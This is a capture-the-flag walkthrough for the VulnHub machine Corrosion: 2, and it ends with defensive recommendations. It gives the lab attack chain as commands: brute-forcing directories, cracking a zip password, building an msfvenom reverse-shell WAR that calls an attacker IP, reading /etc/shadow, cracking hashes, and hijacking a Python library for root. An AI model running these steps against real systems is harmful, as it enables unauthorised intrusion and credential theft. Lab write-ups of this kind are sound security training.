Overview

Proxy Programmer’s Corrosion: 2 is a medium-difficulty machine available on VulnHub. It is designed to challenge experienced CTF players with a variety of tasks that test their abilities in network scanning, enumeration, exploitation, and privilege escalation. This walkthrough provides a step-by-step guide to compromising the machine, along with the methodology, recommendations, and a concluding analysis.

Methodology

Network Scanning:

Identify the target machine’s IP address.
Scan for open ports and services using Nmap.

2. Enumeration:

Explore available web services on identified ports.
Perform directory brute-forcing to discover hidden files or directories.
Analyze the discovered files for useful information.

3. Exploitation:

Use discovered credentials to access restricted areas.
Upload a reverse shell payload to gain initial access.
Escalate privileges by leveraging discovered vulnerabilities or misconfigurations.

4. Post-Exploitation:

Obtain user and root flags.

Walkthrough

1. Network Scanning

We begin by identifying the target machine’s IP address using netdiscover:

netdiscover

Target IP: 192.168.1.11

Next, we use nmap to scan the identified IP for open ports and running services:

nmap -sV 192.168.1.11

Nmap Results:

Port 22: SSH
Port 80: HTTP (Apache Server)
Port 8080: HTTP (Tomcat Server)

2. Enumeration

First, we check the Apache server on port 80, which only displays the default Apache page. We then move on to the Tomcat server on port 8080, but find nothing unusual.

Next, we looked at the Tomcat server, which was listening on port 8080. It’s a straightforward page with nothing suspicious on it.

Next, we perform directory brute-forcing on the Tomcat server using dirb:

dirb http://192.168.1.11:8080/ -X .php,.zip

Findings: A backup file (backup.zip) is discovered in one of the directories.

We download the zip file using wget:

wget http://192.168.1.11:8080/backup.zip

Following that, we attempted to study this file, but it was password protected.

unzip backup.zip

Attempting to unzip the file reveals it is password-protected. We use fcrackzip with the rockyou.txt wordlist to crack the password:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

Cracked Password: @administrator_hi5

We unzip the file and examine its contents:

unzip backup.zip

We are now inspecting the tomcat users xml file.

cat tomcat-users.xml

Findings: The tomcat-users.xml file reveals the credentials: admin:melehifokivai.

3. Exploitation

Using the discovered credentials, we log into the Tomcat Manager application and upload a reverse shell payload created with msfvenom:

you can make a war file using msfvenom.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.9 LPORT=5555 -f war -o revshell.war

Payload Details:

LHOST: The attacker’s IP address (e.g., 192.168.1.9)
LPORT: The listening port on the attacker’s machine (e.g., 5555)
Output Format: WAR (Web Application Archive)

After making the payload, you can upload it there. which is located at the bottom part of the manager page.

After uploading you should be seeing this.

Press enter or click to view image in full size

Do a netcat command to listen to the reverse shell.

Get Anshika’s stories in your inbox

Join Medium for free to get updates from this writer.

then click the /revshell/ for it to start and you should have this displayed on the terminal

nc -lnvp 5555

After triggering the payload, we obtain a shell. To improve the shell environment, we use Python:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

With a better shell environment, we begin exploring the system for sensitive files and potential avenues for privilege escalation. We navigate to the home directory and discover the user.txt flag, along with a note that provides clues for further exploitation.

cd /home
ls
cd jaye
ls

cd /randy
ls
cat user.txt
cat note.txt

User Flag: Found in user.txt.
Note: Provides hints related to privilege escalation.

Next, we attempt to log in as another user, jaye, using the same password melehifokivai. The login is successful via SSH:

ssh jaye@192.168.1.11

Once logged in as jaye, we use Python to get a fully interactive shell:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

The note found earlier suggests that jaye has access to the look command, which can be exploited to read sensitive files such as /etc/shadow and /etc/passwd.

Following instructions from GTFOBins (a repository of Unix binaries that can be exploited by an attacker), we use the look command to extract the password hash for the user randy.

We then save the hash to a file named hash.txt and use john, a password-cracking tool, to crack the hash.

john — wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked Password: 07051986randy

4. Privilege Escalation

With Randy’s password in hand, we log in via SSH:

ssh randy@192.168.1.11

Once inside, we check for sudo privileges using the sudo -l command:

The output reveals that Randy can run a Python script with elevated privileges. Specifically, the randombase64.py script is of interest, as it imports a module named base64. This suggests a potential for Python library hijacking, where we can modify the base64.py library to execute arbitrary commands with root privileges.

sudo -l
cat /home/randy/randombase64.py

To obtain base64 file coordinates, we use the locate command. In a couple of seconds, we discover its coordinates. We investigated the file’s restrictions. Using this file, we can gain root access.

locate base64.py

ls -la /usr/lib/python3.8/base64.py

Press enter or click to view image in full size

We edit the file using nano and inject a command to spawn a root shell:

nano /usr/lib/python3.8/base64.py

Add this code to get root access to the victim’s machine.

import os
os.system(“/bin/bash”)

Finally, we run the randombase64.py script using sudo, which triggers the modified base64.py and spawns a root shell:

sudo /usr/bin/python3.8 /home/randy/randombase64.py

With root access, we navigate to the root directory and retrieve the root.txt flag:

ls
cd
cat root.txt

And We completed this machine!!

Recommendations

1. Enforce Strong Password Policies:
Use complex and unique passwords across all accounts, and implement multi-factor authentication to reduce the risk of credential-based attacks.

2. Secure Backup Files:
Ensure that sensitive files, such as backups, are securely stored and encrypted. Additionally, avoid placing them in publicly accessible web directories.

3. Restrict Access to Management Interfaces:
Limit access to services like the Tomcat Manager by implementing IP-based restrictions and securing it behind a VPN or firewall.

4. Regular Security Audits:
Perform routine security assessments to identify and mitigate vulnerabilities, especially those related to privilege escalation. Review and restrict sudo privileges to the minimum necessary.

5. Implement Proper Logging and Monitoring:
Enable comprehensive logging and monitoring across the system to detect suspicious activities such as unauthorized file access or privilege escalation attempts.

Conclusion

The Corrosion: 2 machine offers a comprehensive challenge that covers the full spectrum of penetration testing techniques, from initial network enumeration to advanced privilege escalation. The exercise highlights the importance of securing sensitive files, enforcing strict password policies, and regularly auditing system configurations to prevent potential exploitation. By following the recommendations provided, organizations can significantly reduce the risk of similar vulnerabilities being exploited in real-world environments.

Corrosion: 2 VulnHub Walkthrough